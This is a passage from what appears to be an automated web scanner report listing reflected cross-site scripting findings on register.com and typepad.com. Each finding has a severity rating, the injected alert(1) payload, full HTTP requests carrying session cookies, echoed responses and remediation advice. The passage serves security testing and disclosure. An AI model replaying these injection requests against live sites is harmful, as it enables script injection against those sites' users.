Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:14:19 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22798
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/domain/searchresults.rcmxc08de";alert(1)//874342fb6c6",width:400,height:400 }
</script>
...[SNIP]...

4.15. http://www.register.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8565"%3balert(1)//1bdb2705792 was submitted in the REST URL parameter 1. This input was echoed as d8565";alert(1)//1bdb2705792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icod8565"%3balert(1)//1bdb2705792 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.register.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:36:48 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22770
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/favicon.icod8565";alert(1)//1bdb2705792",width:400,height:400 }
</script>
...[SNIP]...

4.16. http://www.register.com/font/vag-bold.ttf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /font/vag-bold.ttf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41cfd"%3balert(1)//a7bdf3e7ba5 was submitted in the REST URL parameter 1. This input was echoed as 41cfd";alert(1)//a7bdf3e7ba5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /font41cfd"%3balert(1)//a7bdf3e7ba5/vag-bold.ttf HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:33:09 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22782
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/font41cfd";alert(1)//a7bdf3e7ba5/vag-bold.ttf",width:400,height:400 }
</script>
...[SNIP]...

4.17. http://www.register.com/font/vag-bold.woff [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /font/vag-bold.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d15"%3balert(1)//be090e0bf41 was submitted in the REST URL parameter 1. This input was echoed as e0d15";alert(1)//be090e0bf41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fonte0d15"%3balert(1)//be090e0bf41/vag-bold.woff HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:38 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22784
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/fonte0d15";alert(1)//be090e0bf41/vag-bold.woff",width:400,height:400 }
</script>
...[SNIP]...

4.18. http://www.register.com/images/sn/hp.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /images/sn/hp.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 593a2"%3balert(1)//40444370589 was submitted in the REST URL parameter 1. This input was echoed as 593a2";alert(1)//40444370589 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images593a2"%3balert(1)//40444370589/sn/hp.xml HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:37:36 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22780
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/images593a2";alert(1)//40444370589/sn/hp.xml",width:400,height:400 }
</script>
...[SNIP]...

4.19. http://www.register.com/js/aop-attach.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/aop-attach.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da06"%3balert(1)//439baa57256 was submitted in the REST URL parameter 1. This input was echoed as 7da06";alert(1)//439baa57256 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js7da06"%3balert(1)//439baa57256/aop-attach.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:18 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22780
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/js7da06";alert(1)//439baa57256/aop-attach.js",width:400,height:400 }
</script>
...[SNIP]...

4.20. http://www.register.com/js/homepage-optimized.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/homepage-optimized.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab187"%3balert(1)//73f4a6a9461 was submitted in the REST URL parameter 1. This input was echoed as ab187";alert(1)//73f4a6a9461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsab187"%3balert(1)//73f4a6a9461/homepage-optimized.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:35:35 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22796
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/jsab187";alert(1)//73f4a6a9461/homepage-optimized.js",width:400,height:400 }
</script>
...[SNIP]...

4.21. http://www.register.com/js/jquery-1.3.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2708"%3balert(1)//8e023ddd2cd was submitted in the REST URL parameter 1. This input was echoed as c2708";alert(1)//8e023ddd2cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc2708"%3balert(1)//8e023ddd2cd/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:35:12 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22792
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/jsc2708";alert(1)//8e023ddd2cd/jquery-1.3.2.min.js",width:400,height:400 }
</script>
...[SNIP]...

4.22. http://www.register.com/unauthenticated_session_expired.rcmx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /unauthenticated_session_expired.rcmx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbc4"%3balert(1)//79639f1ebd8 was submitted in the REST URL parameter 1. This input was echoed as fbbc4";alert(1)//79639f1ebd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unauthenticated_session_expired.rcmxfbbc4"%3balert(1)//79639f1ebd8?opener=/domain/searchresults.rcmx HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547; OAX=Mhd7ak5inIsACxRd; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:15:09 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22820
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/unauthenticated_session_expired.rcmxfbbc4";alert(1)//79639f1ebd8",width:400,height:400 }
</script>
...[SNIP]...

4.23. http://www.typepad.com/services/toolbar [autofollowed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /services/toolbar

Issue detail

The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b29d9%3balert(1)//eb59c1b15d3 was submitted in the autofollowed parameter. This input was echoed as b29d9;alert(1)//eb59c1b15d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/toolbar?blog_id=6a011571d38234970b011570df1227970c&asset_id=&atype=index&to=http%3A%2F%2Fmeetupblog.meetup.com%2F&autofollowed=0b29d9%3balert(1)//eb59c1b15d3&safe_to_modify_body=0 HTTP/1.1
Host: www.typepad.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 13:13:20 GMT
Server: Apache
X-Webserver: oak-tp-app004
Cache-Control: private
Pragma: no-cache
Vary: cookie,negotiate,accept-language,Accept-Encoding
Content-Language: en
Content-Length: 14887
Content-Type: text/html; charset=utf-8
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c
...[SNIP]...
lorAnim = YAHOO.util.ColorAnim,
Easing = YAHOO.util.Easing,
Cookie = YAHOO.util.Cookie,
TPToolbar = {};

TPToolbar = {

params: {
autofollowed: 0b29d9;alert(1)//eb59c1b15d3,
blog_user_xid: '6p011571d38234970b',
display: 0,
entry_xid: '',
logged_in: 0,
safe_to_modify_body: '0',
permal
...[SNIP]...

4.24. http://www.register.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.register.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6856"-alert(1)-"f95696cf372 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=f6856"-alert(1)-"f95696cf372

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:08 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 30175
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=f6856"-alert(1)-"f95696cf372";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.25. http://www.register.com/domain/searchresults.rcmx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35db8"-alert(1)-"435739ce645 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

